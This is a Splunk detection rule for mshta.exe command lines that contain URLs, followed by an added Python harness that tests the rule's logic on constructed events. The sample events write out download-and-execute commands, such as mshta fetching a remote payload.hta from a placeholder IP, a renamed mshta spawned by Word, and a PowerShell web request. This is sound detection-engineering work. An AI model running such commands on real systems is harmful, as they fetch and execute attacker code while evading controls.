detect_mshta_url_in_command_line.yml
name: Detect MSHTA Url in Command Line
id: 9b3af1e6-5b68-11eb-ae93-0242ac130002
version: 2
date: '2021-09-16'
author: Michael Haag, Splunk
type: TTP
datamodel:
- Endpoint
description: This analytic identifies use of the Microsoft HTML Application Host
(mshta.exe) to make remote HTTP connections. Adversaries may use mshta.exe, a signed
Microsoft-supplied binary, to proxy the download and execution of remote .hta files
and so bypass preventative controls. The analytic matches mshta.exe command-line
arguments that contain http:// or https://. The search returns the first and last
time these command-line arguments were observed, along with the target system, the
user, the mshta.exe process and its parent process.
search: '| tstats `security_content_summariesonly` count values(Processes.process)
as process values(Processes.parent_process) as parent_process min(_time) as firstTime
max(_time) as lastTime from datamodel=Endpoint.Processes where `process_mshta` (Processes.process="*http://*"
OR Processes.process="*https://*") by Processes.user Processes.process_name Processes.parent_process_name
Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_mshta_url_in_command_line_filter`'
how_to_implement: To successfully implement this search you need to be ingesting
endpoint process-execution events that include the process name, the full command
line and the parent process, mapped into the `Processes` node of the `Endpoint`
datamodel. In addition, confirm that the latest CIM App (4.20 or higher) and the
latest TA for your endpoint product are installed.
known_false_positives: Legitimate applications and scripts may launch mshta.exe with
a URL on the command line; tune the `detect_mshta_url_in_command_line_filter` macro
to exclude them.
references:
- https://github.com/redcanaryco/AtomicTestHarnesses
- https://redcanary.com/blog/introducing-atomictestharnesses/
- https://docs.microsoft.com/en-us/windows/win32/search/-search-3x-wds-extidx-prot-implementing
tags:
analytic_story:
- Suspicious MSHTA Activity
asset_type: Endpoint
automated_detection_testing: passed
cis20:
- CIS 8
confidence: 100
context:
- Source:Endpoint
- Stage:Defense Evasion
dataset:
- https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1218.005/atomic_red_team/windows-sysmon.log
impact: 80
kill_chain_phases:
- Exploitation
message: An instance of $parent_process_name$ spawning $process_name$ was identified
on endpoint $dest$ by user $user$ attempting to access a remote destination to
download an additional payload.
mitre_attack_id:
- T1218
- T1218.005
nist:
- PR.PT
- DE.CM
observable:
- name: user
type: User
role:
- Victim
- name: dest
type: Hostname
role:
- Victim
- name: parent_process_name
type: Parent Process
role:
- Parent Process
- name: process_name
type: Process
role:
- Child Process
product:
- Splunk Enterprise
- Splunk Enterprise Security
- Splunk Cloud
required_fields:
- _time
- Processes.dest
- Processes.user
- Processes.parent_process_name
- Processes.parent_process
- Processes.original_file_name
- Processes.process_name
- Processes.process
- Processes.process_id
- Processes.parent_process_path
- Processes.process_path
- Processes.parent_process_id
risk_score: 80
security_domain: endpoint
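The following is an added example, not part of the splunk/security_content project: a pure-Python re-implementation of the search's where clause, `by` grouping and `firstTime`/`lastTime` aggregation, run over constructed process-creation events so the logic can be checked offline before it is deployed. It assumes the `process_mshta` macro matches on `process_name` or `original_file_name` (so a renamed copy of mshta.exe is still caught), models `detect_mshta_url_in_command_line_filter` as a hypothetical parent-process allowlist, renders `security_content_ctime` in UTC, and matches the http/https wildcard case-insensitively as a choice of this example. The sample events, hosts and URLs are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample events shaped like the Endpoint.Processes datamodel fields the
# search reads (not real telemetry). _time is Unix epoch seconds.
SAMPLE_EVENTS = [
    {"_time": 1631779200, "dest": "WS01", "user": "CORP\\alice",
     "process_name": "mshta.exe", "original_file_name": "MSHTA.EXE",
     "process": "mshta.exe http://203.0.113.10/payload.hta",
     "parent_process_name": "cmd.exe",
     "parent_process": "cmd.exe /c mshta.exe http://203.0.113.10/payload.hta"},
    {"_time": 1631779260, "dest": "WS01", "user": "CORP\\alice",
     "process_name": "mshta.exe", "original_file_name": "MSHTA.EXE",
     "process": "mshta.exe HTTPS://203.0.113.10/second.hta",
     "parent_process_name": "cmd.exe",
     "parent_process": "cmd.exe /c mshta.exe HTTPS://203.0.113.10/second.hta"},
    # Renamed copy of mshta.exe: process_name changes, original_file_name does not.
    {"_time": 1631779320, "dest": "WS02", "user": "CORP\\bob",
     "process_name": "svch0st.exe", "original_file_name": "MSHTA.EXE",
     "process": "svch0st.exe https://example.test/x.hta",
     "parent_process_name": "winword.exe",
     "parent_process": "WINWORD.EXE /n report.docx"},
    # Local .hta with no URL on the command line: must not match.
    {"_time": 1631779380, "dest": "WS03", "user": "CORP\\carol",
     "process_name": "mshta.exe", "original_file_name": "MSHTA.EXE",
     "process": "mshta.exe C:\\Users\\carol\\app.hta",
     "parent_process_name": "explorer.exe", "parent_process": "explorer.exe"},
    # A URL, but not mshta: must not match.
    {"_time": 1631779440, "dest": "WS03", "user": "CORP\\carol",
     "process_name": "powershell.exe", "original_file_name": "PowerShell.EXE",
     "process": "powershell.exe -c iwr http://example.test/a",
     "parent_process_name": "explorer.exe", "parent_process": "explorer.exe"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def is_mshta(ev):
    """Stand-in for the `process_mshta` macro (assumed definition): match on
    process_name or original_file_name so a renamed binary is still caught."""
    return (ev["process_name"].lower() == "mshta.exe"
            or ev["original_file_name"].upper() == "MSHTA.EXE")


def has_url(ev):
    """Processes.process="*http://*" OR Processes.process="*https://*"; matched
    case-insensitively here so HTTP:// and Https:// variants are not missed."""
    return URL_RE.search(ev["process"]) is not None


def ctime(epoch):
    """Stand-in for `security_content_ctime`; rendered in UTC in this example."""
    return datetime.fromtimestamp(epoch, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%S")


def run_detection(events, allowed_parents=()):
    """Apply the where clause, then aggregate per the `by` clause. allowed_parents
    is a hypothetical model of the `detect_mshta_url_in_command_line_filter`
    macro: an allowlist of parent process names tuned to the environment."""
    groups = defaultdict(lambda: {"count": 0, "process": set(),
                                  "parent_process": set(), "times": []})
    for ev in events:
        if not (is_mshta(ev) and has_url(ev)):
            continue
        key = (ev["user"], ev["process_name"], ev["parent_process_name"],
               ev["original_file_name"], ev["dest"])
        g = groups[key]
        g["count"] += 1
        g["process"].add(ev["process"])
        g["parent_process"].add(ev["parent_process"])
        g["times"].append(ev["_time"])
    allowed = {p.lower() for p in allowed_parents}
    rows = []
    for (user, pname, ppname, ofn, dest), g in groups.items():
        if ppname.lower() in allowed:
            continue  # the filter macro drops tuned-out results
        rows.append({"user": user, "process_name": pname,
                     "parent_process_name": ppname, "original_file_name": ofn,
                     "dest": dest, "count": g["count"],
                     "process": sorted(g["process"]),
                     "parent_process": sorted(g["parent_process"]),
                     "firstTime": ctime(min(g["times"])),
                     "lastTime": ctime(max(g["times"]))})
    return rows


MESSAGE = ("An instance of $parent_process_name$ spawning $process_name$ was "
           "identified on endpoint $dest$ by user $user$ attempting to access a "
           "remote destination to download an additional payload.")


def render_message(row):
    """Substitute the $field$ tokens of the risk message from a result row."""
    return re.sub(r"\$(\w+)\$", lambda m: str(row.get(m.group(1), m.group(0))), MESSAGE)


if __name__ == "__main__":
    for row in run_detection(SAMPLE_EVENTS):
        print(row["firstTime"], row["lastTime"], row["count"], render_message(row))
```

Running it yields two result rows: the two cmd.exe launches on WS01 collapse into one row with count 2 and the http/HTTPS command lines collected under `process`, and the renamed binary on WS02 is still reported because `original_file_name` carries MSHTA.EXE. The local .hta launch and the PowerShell download produce nothing. Passing `allowed_parents=("cmd.exe",)` shows the filter macro mechanism only; an allowlist that broad would hide real attacks and is not a recommended tuning.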